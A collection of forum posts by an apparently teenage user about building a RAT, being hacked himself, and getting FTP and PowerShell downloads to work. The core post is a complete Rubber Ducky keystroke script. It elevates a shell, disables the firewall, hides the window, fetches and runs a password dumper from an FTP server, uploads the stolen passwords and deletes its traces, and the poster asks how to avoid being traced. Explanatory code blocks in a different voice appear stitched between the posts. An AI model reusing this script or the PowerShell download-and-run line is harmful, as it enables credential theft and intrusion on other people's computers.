contrix_
Active Members, 18 posts

Posts posted by contrix_

  1.  

    6 minutes ago, Dave-ee Jones said:

    The RAT would need to have remote access details directly to your computer which would have to have some kind of willing security breach. In that case, why would you upload it online if it could remotely access your computer with the click of a button?

    And why not make a VM with a virus scanner on it and do some offline scanning, instead?

    I uploaded the file which would have granted me access if someone executed it.

     

    I also considered doing it with a VM, but I would have to download all these virus scanners, which is the advantage of online scanners.

  2. So this is basically an update to my post here: 

     

    I didn't know how the person got my RAT in the first place and how they got onto my computer. Now I know that it wasn't someone who got into my computer because of the cracked version of the RAT program (even though there was a silent Monero miner in it), but someone who got my file from VirusTotal. It's a site where you can scan files and see which of about 50 antiviruses detect it. I didn't know that they distribute the files and that you can directly DOWNLOAD them from the site. So someone was probably running a bot on a virtual machine that downloads all files that get flagged as a RAT by the antivirus programs on VirusTotal. I remember that I once saw a video on YouTube where someone was able to get into the machine of someone who tried to RAT him by using that person's file.

     

    So is there a way that someone used my file to get into my computer? What are they able to do with it?

     

    Thanks for any answers ;)

     

    PS: From now on, if I have to use an online virus scanner, I'm using nodistribute ^^

  3. 15 hours ago, Dave-ee Jones said:

    Theoretically he could've been running any Windows, but from the description it sounds like 98. Was Wireshark actually running or did you just see the icon on the desktop? Either way, worst case scenario is he's a hacker that was trying to hack you. 'Best' case scenario is he was curious and wanted to try out something.

    Not sure what 'found' and 'terminated' could relate to, could be the connection, but I don't think it would say 'found' if a connection between you and him was seen. Terminated was probably when (or just before) you were cut off if that's the case.

     A command prompt running a Python script with the name 'clock' is a bit weird, though. Not sure there, could be anything. Not sure why he would name it clock..

    No, Wireshark was not running or at least I didn't see it.

     

    14 hours ago, i8igmac said:

    What ports are used? When a target machine runs the trojan, does it connect back to your machine? If so, then you would have configured port forwarding? What port is this?

     

    You should monitor this port. It's possible random traffic hit your open port, but it's also possible your tool is a backdoor. hackforum is full of bs tools.

     

    I may have misunderstood what you see. A VNC session? Maybe someone ran your trojan from a VM.

     


    I don't know the port anymore because I deleted it. It was probably a VM; I think the display measurements I saw in NanoCore were 800x800, and I once used a VM that had those quarter windows.

    Update:

    Last night I left my computer on due to Ethereum mining and had one browser window open. When I got up and looked at my screen, the browser window was closed and I was on my Steam account page where I can see my payment methods and all that stuff. I didn't have much time because I had to go to school, but in the browser history were some new entries, and I only saw the first. It was a Sellfy (or something similar) website where someone had a site named something like "crackpw" and sold something for 20 euros. I bet those were my passwords or a connection to my PC. I also had an email from Coinbase (you can buy bitcoins there) that someone logged in from MY IP, but the account was empty and without any payment methods anyway. After school I changed most of my passwords, but I wasn't able to log into my second PayPal account because the password was changed and the telephone number was also changed, so they had access to my email, too. I can't send a ticket to PayPal about that because I used false names and streets (no, not a fake ID), but there were only a few dollars on it.

     

    I didn't notice anything else. I'm going to start my computer without Internet, save some important files that I know are 100% not infected on an external drive, and then reset my whole computer completely.

    Or can I track where the RAT is installed and somehow delete it?

    Thanks for your answers, I hope you will take your time again to answer me ;)

     

    contrix_

  4. Hello,

    something really weird happened to me yesterday. I created a RAT that I encrypted in a WinRAR file and wanted to troll some of my friends with. I sent the file in the chat of my Discord server (similar to TeamSpeak) and before that tested it on virustotal.com and a similar site. No one downloaded it (unfortunately ^^), but a few hours later (when none of the people that were on the Discord were online anymore), I saw a connection coming in. I used a cracked version of NanoCore that I got from some hacking forum (it was created by Alcatraz3222 and thousands of people downloaded it). The computer had an IP from the USA (doesn't have to be true, it shows that I'm from England even though I have a German IP) and had no antivirus installed. Its name was something with a C at the beginning, a y and an o (don't remember it exactly). I wanted to know who that was and opened the window to his screen. He had some old version of Windows installed which I didn't know (it's the one with the gray taskbar, pretty basic). There was a command prompt running, which had a Python logo and was named "clock". I don't remember what was in it, but it was testing for something the whole time and once said something about "found" and "terminated". The only other thing I saw was Wireshark on the desktop. A few seconds after that, he disappeared from my client list. I didn't use any protection like a VPN or a firewall at that moment.

    After that, I got really scared for some reason and turned off my computer. Does anyone know how he got on my list and what he was doing? Maybe I'm getting ratted and he wanted to see what that file was, or a Discord server ran the file?

    I really need your help ;) 

    Cheers,

    contrix_

     

    PS: Sorry for my bad English, I'm German and just 14 years old, as you probably already assumed from my writing ^^

     

    PPS: While writing this text I overwrote my text two times, even though I don't think I touched the Insert button. I'm getting really paranoid xD

  5. Hello,

    I wanted to download files via CMD, and the first way I discovered was FTP. I rented a server and everything worked. The problem is that it takes quite long to type in the credentials. After some research I found this PowerShell line:

    powershell (new-object System.Net.WebClient).DownloadFile('http://website.com/file.exe','%TEMP%\file.exe')

    But I have some questions:

    1. What is the part after %TEMP% for? Is that the destination where the file "arrives"? So if I wanted to download it to C:\, I would just have to change it to C:\, right?
    2. Where can I host the file for free? I found some web hosting sites, but the only databases I was able to find were FTP and MySQL.

    Thank you for your help ;)
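An added example, not code from the post above, showing what the two arguments of DownloadFile mean in practice: the first is the URL, the second is the full local path the file is written to, file name included (a bare directory such as C:\ is not a valid destination). When the one-liner is started from cmd.exe, %TEMP% is expanded by cmd before PowerShell even runs; inside a PowerShell script the equivalent is $env:TEMP. Because a plain-HTTP download carries no integrity protection of its own, the example also checks the file's SHA-256 against a value obtained out of band before it is allowed to land under its final name. The URL, destination and hash are placeholders.

```powershell
# Added example (not from the original post). The URL, the destination path and
# the expected SHA-256 value are placeholders to be replaced by the reader.
function Get-VerifiedFile {
    param(
        [Parameter(Mandatory)] [string] $Url,
        [Parameter(Mandatory)] [string] $Destination,    # full path of the file to write
        [Parameter(Mandatory)] [string] $ExpectedSha256  # hex digest obtained out-of-band
    )

    # DownloadFile's second argument is a file path, so make sure its directory exists.
    # From cmd.exe, %TEMP% is expanded by cmd before PowerShell starts; inside
    # PowerShell the same location is $env:TEMP (or [IO.Path]::GetTempPath()).
    $dir = Split-Path -Parent $Destination
    if (-not (Test-Path -LiteralPath $dir)) {
        New-Item -ItemType Directory -Path $dir | Out-Null
    }

    # Download to a temporary name first, so a half-written or wrong file never
    # sits at the final path under the expected name.
    $partial = "$Destination.part"
    $client = New-Object System.Net.WebClient
    try {
        $client.DownloadFile($Url, $partial)
    } finally {
        $client.Dispose()
    }

    # Verify before trusting: Get-FileHash returns the digest as uppercase hex,
    # and -ne is case-insensitive in PowerShell, so any case of input is fine.
    $actual = (Get-FileHash -LiteralPath $partial -Algorithm SHA256).Hash
    if ($actual -ne $ExpectedSha256) {
        Remove-Item -LiteralPath $partial -Force
        throw "Hash mismatch for $Url : expected $ExpectedSha256, got $actual"
    }

    Move-Item -LiteralPath $partial -Destination $Destination -Force
    return $Destination
}

# Usage (placeholder values):
# Get-VerifiedFile -Url 'http://website.com/file.exe' `
#                  -Destination (Join-Path $env:TEMP 'file.exe') `
#                  -ExpectedSha256 '<sha256 of the file you published>'
```

The .part-then-move pattern matters more than it looks: if the download is interrupted or the server hands back a different file, nothing with the expected name ever exists on disk, so a later step that blindly runs file.exe cannot pick up a half-written or substituted binary.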

    First of all: I'm sorry for my bad English, I'm only 14 and German ^^

    So I just wrote this Rubber Ducky script that downloads an .exe and a .bat from my FTP server. Then it executes the .exe via the .bat file, which creates a .txt file with all the passwords of the victim (of course me, when I forget my passwords :P). Then it deletes the .exe and .bat and uploads the .txt back to my server (it gets deleted after that, too).

    Here's the script:

    DELAY 1000
    REM
    REM start an elevated cmd via PowerShell
    REM
    REM
    GUI r
    DELAY 500
    STRING powershell Start-Process cmd -Verb runAs
    ENTER
    DELAY 2000
    REM confirm the UAC prompt: ALT j presses "Ja" on a German Windows
    ALT j
    DELAY 1000
    REM
    REM
    REM disable firewall
    REM
    REM
    STRING netsh advfirewall set currentprofile state off
    ENTER
    DELAY 500
    REM shrink the window and make the text unreadable
    REM
    STRING mode con:cols=18 lines=1
    ENTER
    STRING color FE
    ENTER
    REM
    REM
    REM download via FTP (one session, binary mode for the .exe)
    REM
    STRING ftp myftpserver.com
    ENTER
    DELAY 1000
    STRING username
    ENTER
    DELAY 1000
    STRING password
    ENTER
    DELAY 500
    STRING lcd C:\
    ENTER
    DELAY 100
    STRING binary
    ENTER
    DELAY 100
    STRING get i.exe
    ENTER
    DELAY 8000
    STRING get r.bat
    ENTER
    DELAY 800
    STRING bye
    ENTER
    DELAY 500
    REM
    REM
    REM PASSWORD STEAL
    REM
    REM
    REM
    STRING cd C:\
    ENTER
    DELAY 500
    STRING r.bat
    ENTER
    DELAY 10000
    STRING del r.bat
    ENTER
    DELAY 500
    STRING del i.exe
    ENTER
    REM
    REM
    REM
    REM UPLOAD (second session, ascii mode is fine for the .txt)
    REM
    REM
    REM
    REM
    DELAY 500
    STRING ftp myftpserver.com
    ENTER
    DELAY 1000
    STRING username
    ENTER
    DELAY 1000
    STRING password
    ENTER
    DELAY 1000
    STRING lcd C:\
    ENTER
    DELAY 100
    STRING ascii
    ENTER
    DELAY 800
    STRING put p.txt
    ENTER
    DELAY 500
    STRING bye
    ENTER
    DELAY 300
    STRING del C:\p.txt
    ENTER
    DELAY 200
    REM re-enable the firewall
    STRING netsh advfirewall set currentprofile state on
    ENTER

    I'm right now working on decreasing the delays, but the download and upload delays are hard to time because they obviously depend on the internet speed the victim has.

    My ideas to improve this script:

    Leave the first FTP window open so I don't need to log in again (cons: 1. I could get thrown out of the session after some time; 2. I probably wouldn't be able to switch with ALT + TAB because I don't know what other windows the victim has open).

    My question:

    Does this leave something like a log file, so that the victim could trace me back? If so, where would it be located?

     

    Do you guys have some suggestions? I would love to hear them :D

    Disclaimer: I can't put the .exe on my Rubber Ducky using the Twin Duck method because I am using the MalDuino from Seytonic (basically a cheap Rubber Ducky), which cannot be used as a Twin Duck.

    Thanks for your answers,

    contrix_

    Edit:

    This is the batchfile:

    i /stext p.txt

    Disclaimer 2: Everything works fine without any problems.

     
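The post above asks whether the script leaves a log that the victim could use to trace it back. An added example, not the poster's code, of what an investigator on the target machine would query for exactly this payload: the firewall log records the profile being switched off and back on (event 2003), Security event 4688 records every process start together with its command line, so the typed `ftp myftpserver.com` appears there with the server name in it, and PowerShell script block logging (event 4104) records the `Start-Process cmd -Verb runAs` one-liner. It assumes process-creation auditing with command-line logging and script block logging are enabled; both are typically off on a default client install, while the firewall log is on. Independently of the local logs, the FTP login the script types goes over the network in clear text, so anyone capturing the victim's traffic gets the server name and the credentials.

```powershell
# Added example, not part of the original post. Assumes "Audit Process Creation"
# with command-line logging and PowerShell script block logging are enabled;
# without them the Security and PowerShell queries simply return nothing.
function Find-DuckyTraces {
    param([datetime] $Since = (Get-Date).AddHours(-1))

    # 1. Firewall profile switched off/on: event 2003 in the firewall operational
    #    log ("A ... Firewall setting in the ... profile has changed").
    $fwLog = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall'
    Get-WinEvent -FilterHashtable @{ LogName = $fwLog; Id = 2003; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{
                Time   = $_.TimeCreated
                Source = 'FirewallSettingChanged'
                Detail = ($_.Message -split "`r?`n")[0]
            }
        }

    # 2. Security 4688: every process start. The typed "ftp myftpserver.com" ends
    #    up verbatim in "Process Command Line", server name included; netsh.exe
    #    and the cmd started via Start-Process -Verb runAs show up the same way.
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $Since } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match '\\(netsh|ftp)\.exe' -or $_.Message -match 'Process Command Line:.*Start-Process cmd' } |
        ForEach-Object {
            $evt  = $_
            $line = ($evt.Message -split "`r?`n" | Where-Object { $_ -match '^\s*Process Command Line:' }) -join ' '
            [pscustomobject]@{
                Time   = $evt.TimeCreated
                Source = 'ProcessCreation'
                Detail = $line.Trim()
            }
        }

    # 3. PowerShell 4104: the elevation one-liner is recorded as a script block.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $Since } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'Start-Process\s+cmd.*-Verb\s+runAs' } |
        ForEach-Object {
            [pscustomobject]@{
                Time   = $_.TimeCreated
                Source = 'PowerShellScriptBlock'
                Detail = 'Start-Process cmd -Verb runAs'
            }
        }
}

# Usage: traces from the last hour, oldest first. Reading the Security log needs
# an elevated prompt.
# Find-DuckyTraces | Sort-Object Time | Format-Table -AutoSize
```

The three sources are deliberately queried separately rather than through one big filter: the firewall log answers "did the protection go down", 4688 answers "what ran and with which arguments", and 4104 answers "what did PowerShell actually execute", and an investigator wants to know which of the three was available on the box as much as what they contained.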

    First of all: Sorry for my bad English, I'm German and only 14 years old.

    I uploaded an .exe file from my computer to my FTP server with ftp.exe (cmd). Before I did that it was working just fine. But after I downloaded it, it came up with the following error: "The file is not compatible with your computer." Before that, it came up with another error, something like "not compatible with a 64-bit system".

    I accidentally asked the question on StackOverflow 2 hours ago, and some people answered that I have to activate binary mode. When I do that with the "binary" command, I get a response that the activation was successful, but it isn't working anyway. The .exe looks identical after download, but instead of having the old icon it shows the standard .exe icon. I do not want to use another FTP program like FileZilla or ncftp (I tried it with FileZilla, it isn't working either, so I don't think that ftp.exe is the problem here).

    The commands I used + output (maybe the translation isn't correct, but I think you know what the output meant):

    C:\WINDOWS\system32>ftp myftpserver.com
    Connection to icarus.bplaced.net established.
    220 Welcome to myftpserver.com, FTP server standing by ...
    504 Unknown command
    User (myftpserver.com:(none)): user
    331 Hello user, your FTP account password is required:
    password: password
    230-Login successful, your current directory is /
    230 34349 Kbytes used (3%) - authorized: 1048576 Kb
    ftp> binary
    200 TYPE is now 8-bit binary
    ftp> get example.exe
    200 PORT command successful
    150-Connecting to port 61051
    150 347.5 kbytes to download
    226-File successfully transferred
    226 1.648 seconds (measured here), 210.83 Kbytes per second
    FTP: 355794 bytes received in 1.91 seconds 186.38KB/s
    ftp>

    Thanks and greetings, c0ntriX

    Edit: I'm on a 64-bit system.
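"The file is not compatible with your computer" is what Windows reports when the PE headers it reads do not line up, and the classic way an FTP transfer produces that is ASCII mode: the client rewrites line endings, so every bare LF (0x0A) in the binary becomes CR LF and every offset after the first one shifts by a byte, including e_lfanew, the pointer at 0x3C that says where the "PE\0\0" header lives. An added example, not from the post above, that checks a file the way the loader does (MZ signature, e_lfanew, PE signature, then the Machine field that distinguishes x86 from x64) and then applies the rewrite to a small constructed header in memory to show the same check failing afterwards. The header bytes are constructed for the demonstration; the exact rewrite a real ASCII transfer performs depends on server and client, but any change of length is enough to break the offsets.

```powershell
# Added example, not from the original post. The sample header below is
# constructed in memory; it is not a real executable.
function Test-PeImage {
    param([Parameter(Mandatory)] [byte[]] $Bytes)

    $result = [ordered]@{ IsPe = $false; Machine = $null; Reason = '' }

    # IMAGE_DOS_HEADER starts with "MZ" and is 0x40 bytes long.
    if ($Bytes.Length -lt 0x40 -or $Bytes[0] -ne 0x4D -or $Bytes[1] -ne 0x5A) {
        $result.Reason = 'no MZ signature'
        return [pscustomobject]$result
    }

    # e_lfanew: 32-bit little-endian offset of the PE header, stored at 0x3C.
    $peOffset = [BitConverter]::ToInt32($Bytes, 0x3C)
    if ($peOffset -lt 0 -or ($peOffset + 6) -gt $Bytes.Length) {
        $result.Reason = "e_lfanew $peOffset points outside the file"
        return [pscustomobject]$result
    }

    # "PE\0\0" signature, followed by IMAGE_FILE_HEADER whose first field is Machine.
    if ($Bytes[$peOffset] -ne 0x50 -or $Bytes[$peOffset + 1] -ne 0x45 -or
        $Bytes[$peOffset + 2] -ne 0 -or $Bytes[$peOffset + 3] -ne 0) {
        $result.Reason = "no PE signature at offset $peOffset"
        return [pscustomobject]$result
    }

    $machine = [BitConverter]::ToUInt16($Bytes, $peOffset + 4)
    $result.IsPe    = $true
    $result.Machine = switch ($machine) {
        0x014C  { 'x86' }
        0x8664  { 'x64' }
        default { '0x{0:X4}' -f $machine }
    }
    return [pscustomobject]$result
}

function ConvertTo-AsciiModeDamage {
    # Approximates what an ASCII-mode transfer does to a binary on a Windows
    # client: every bare LF (0x0A) becomes CR LF (0x0D 0x0A), so every byte
    # after the first LF moves one position further into the file.
    param([Parameter(Mandatory)] [byte[]] $Bytes)
    $out = New-Object System.Collections.Generic.List[byte]
    for ($i = 0; $i -lt $Bytes.Length; $i++) {
        if ($Bytes[$i] -eq 0x0A -and ($i -eq 0 -or $Bytes[$i - 1] -ne 0x0D)) { $out.Add(0x0D) }
        $out.Add($Bytes[$i])
    }
    return ,$out.ToArray()
}

# Constructed sample: a 0x40-byte DOS header with e_lfanew = 0x40, one stray LF
# inside the DOS stub so the rewrite has something to hit, then "PE\0\0" and
# Machine = 0x8664 (x64).
$sample = New-Object byte[] 0x48
$sample[0] = 0x4D; $sample[1] = 0x5A                       # "MZ"
$sample[0x20] = 0x0A                                        # a line feed inside the header
[BitConverter]::GetBytes([int]0x40).CopyTo($sample, 0x3C)   # e_lfanew
$sample[0x40] = 0x50; $sample[0x41] = 0x45                  # "PE\0\0"
[BitConverter]::GetBytes([uint16]0x8664).CopyTo($sample, 0x44)

Test-PeImage -Bytes $sample
Test-PeImage -Bytes (ConvertTo-AsciiModeDamage -Bytes $sample)
```

The first call reports a valid x64 image. In the damaged copy the four bytes at 0x3C are no longer the ones that were written there, so e_lfanew now reads 0x4000 and the check fails with "points outside the file" before the PE signature is even looked at; that is the same situation the loader is in when it refuses the downloaded .exe. Running Test-PeImage against the file from the transcript (Get-Content -Encoding Byte, or [IO.File]::ReadAllBytes) tells you whether the bytes on disk are still a PE before you start suspecting ftp.exe, and comparing Get-FileHash on both ends settles whether the transfer changed anything at all.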

    I tried pasv, it didn't work. The script is PowerShell code. But do you know what I have to insert in "????"? It was originally "FTP_Folder". Maybe it's the target folder on the FTP server? If it were the root folder, I would just have to type in "/", right? The folder "files" is empty when I insert "/".

  9. So I just tried a script from the StackOverflow Site, but when I execute it, nothing happens.

      #FTP Server Information - SET VARIABLES
        $ftp = "ftp://myftpserver.com"   # WebRequest.Create needs a full ftp:// URL, a bare host name is not a valid URI
        $user = 'User'
        $pass = 'pass'
        $folder = '????'                  # directory on the server relative to the login root
        $target = "C:\Users\me\Desktop\files"

        #SET CREDENTIALS
        $credentials = New-Object System.Net.NetworkCredential($user, $pass)

        # Lists the names in a remote directory (FTP NLST) and returns them one per line
        function Get-FtpDir ($url, $credentials) {
            $request = [Net.WebRequest]::Create($url)
            $request.Method = [System.Net.WebRequestMethods+FTP]::ListDirectory
            if ($credentials) { $request.Credentials = $credentials }
            $response = $request.GetResponse()
            $reader = New-Object IO.StreamReader $response.GetResponseStream()
            while (-not $reader.EndOfStream) {
                $reader.ReadLine()
            }
            #$reader.ReadToEnd()
            $reader.Close()
            $response.Close()
        }

        #SET FOLDER PATH
        $folderPath = $ftp + "/" + $folder + "/"

        $files = Get-FtpDir -url $folderPath -credentials $credentials

        $files

        # The local target directory has to exist, DownloadFile does not create it
        if (-not (Test-Path $target)) { New-Item -ItemType Directory -Path $target | Out-Null }

        # WebClient over ftp:// uses passive mode by default, so this works where ftp.exe's PORT fails
        $webclient = New-Object System.Net.WebClient
        $webclient.Credentials = New-Object System.Net.NetworkCredential($user, $pass)
        $counter = 0
        foreach ($file in ($files | Where-Object { $_ -like "*.exe" })) {
            $source = $folderPath + $file
            $destination = Join-Path $target $file
            $webclient.DownloadFile($source, $destination)
            $counter++
        }
        "$counter file(s) downloaded to $target"

    I don't know what to insert in $folder, the guy who made it just wrote "FTP_Folder". Is that the target folder on the FTP server? If it were the root folder, I would just have to type in "/", right? The folder "files" is empty when I insert "/".

    I tried exactly what the guy in the video did. You can see the commands I used in my question. The problem with a 3rd-party FTP client is that the "victim" doesn't have it installed. I put WinSCP (which is a 3rd-party FTP client) on my server, but surprisingly I couldn't download it. I'll try that PowerShell thingy. Thanks for your effort though.

    Thank you for your answer. I tried everything you said, but it didn't work. I just tried it on Linux with -p for passive mode and everything worked fine, so passive mode is the problem.

    Btw: I just remembered that I asked the question here because it had nothing to do with the Rubber Ducky. I only had the problem with the commands and had already a script from the Payloads site + Batch File, that used those commands.

    But thanks for your answer anyway ;) Do you have any idea how I can solve that passive-mode problem? Why and how can others download files from an FTP server via CMD then?

    I wanted to make a Rubber Ducky script that uploads to or downloads from my FTP server.

    I came up with these commands:

    For downloading:

    ftp -i ftpserver.com

    *typing in username and pass*

    get file.exe (yes, the file is in the root folder)

    The login worked fine. On my first FTP server, I got the error message "Error 500 Unable to service PORT commands". After some research, I found out that ftp.exe does not support passive mode (no, the pasv command didn't work). For whatever reason, I tried it on my other servers. So I typed everything in again, and then I got the message "200 Port command successful" and a few seconds after that "425 Could not open data connection to port 65086: Connection timed out" (no, the server wasn't down).

    For uploading I used these commands:

    ftp -i ftpserver.com
    
    *typing in username and pass*
    
    lcd C:\Users\myname\Desktop
    
    put myfile.exe

    With these commands I get the same error as on servers 1 and 2.

    Can anyone help me?

     

    contrix_ ;)
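The two error messages in the post above are the same problem seen from two servers. In active mode the client sends PORT with its own address and a port it is listening on, and the server connects back to it for the data; ftp.exe only knows this mode. A client behind NAT advertises a private address in PORT, so the server's connection attempt can never arrive, which is exactly the "425 Could not open data connection to port 65086" timeout (and turning the client firewall off, as the Ducky script does, changes nothing about that). In passive mode the server answers PASV with its own address and port and the client dials out, which works through NAT, which is why the Linux client with -p succeeded. An added example, not from the original post, that encodes and decodes the two commands so the difference is visible, and downloads a file with .NET's FtpWebRequest, whose UsePassive switch is the knob ftp.exe lacks. Host, account and file name are placeholders.

```powershell
# Added example, not from the original post. Host, credentials and file are
# placeholders; the addresses in the usage lines are constructed for illustration.

function ConvertTo-FtpPortArgument {
    # Encodes the PORT argument (h1,h2,h3,h4,p1,p2) a client sends in active mode:
    # its own address and a listening port split into high and low byte.
    param(
        [Parameter(Mandatory)] [ipaddress] $Address,
        [Parameter(Mandatory)] [int] $Port
    )
    $h = $Address.GetAddressBytes()
    return '{0},{1},{2},{3},{4},{5}' -f $h[0], $h[1], $h[2], $h[3], [int][math]::Floor($Port / 256), ($Port % 256)
}

function ConvertFrom-FtpPasvReply {
    # Parses "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)" into the endpoint the
    # client has to dial for the data connection.
    param([Parameter(Mandatory)] [string] $Reply)
    if ($Reply -notmatch '\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)') {
        throw "not a PASV reply: $Reply"
    }
    [pscustomobject]@{
        Address = '{0}.{1}.{2}.{3}' -f $Matches[1], $Matches[2], $Matches[3], $Matches[4]
        Port    = [int]$Matches[5] * 256 + [int]$Matches[6]
    }
}

function Get-FtpFile {
    param(
        [Parameter(Mandatory)] [string] $Uri,               # e.g. ftp://ftpserver.com/file.exe
        [Parameter(Mandatory)] [pscredential] $Credential,
        [Parameter(Mandatory)] [string] $Destination,
        [switch] $Active                                    # reproduce ftp.exe's PORT behaviour
    )
    $req = [System.Net.FtpWebRequest]::Create($Uri)
    $req.Method      = [System.Net.WebRequestMethods+Ftp]::DownloadFile
    $req.Credentials = $Credential.GetNetworkCredential()
    $req.UseBinary   = $true            # TYPE I: never ASCII for an .exe
    $req.UsePassive  = -not $Active     # PASV: the client opens the data connection

    $resp = $req.GetResponse()
    try {
        $stream = $resp.GetResponseStream()
        $file   = [System.IO.File]::Create($Destination)
        try { $stream.CopyTo($file) } finally { $file.Dispose(); $stream.Dispose() }
    } finally {
        $resp.Close()
    }
    return (Get-Item -LiteralPath $Destination).Length
}

# What the two modes put on the wire (constructed addresses):
ConvertTo-FtpPortArgument -Address '192.168.1.10' -Port 65086
ConvertFrom-FtpPasvReply '227 Entering Passive Mode (203,0,113,5,195,149)'

# Passive download, which works from behind NAT; add -Active to reproduce the
# 425 that ftp.exe gets.
# Get-FtpFile -Uri 'ftp://ftpserver.com/file.exe' -Credential (Get-Credential) `
#             -Destination (Join-Path $env:TEMP 'file.exe')
```

The first usage line yields 192,168,1,10,254,62: a private address plus the high and low byte of port 65086, and that private address is what the server in the post tried and failed to reach. The second yields 203.0.113.5 port 50069, an endpoint the client can dial itself. Whatever tool ends up on the target machine, the credentials still cross the network in clear text on the control connection, which is the other reason to prefer HTTPS with a hash check over FTP for fetching binaries.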
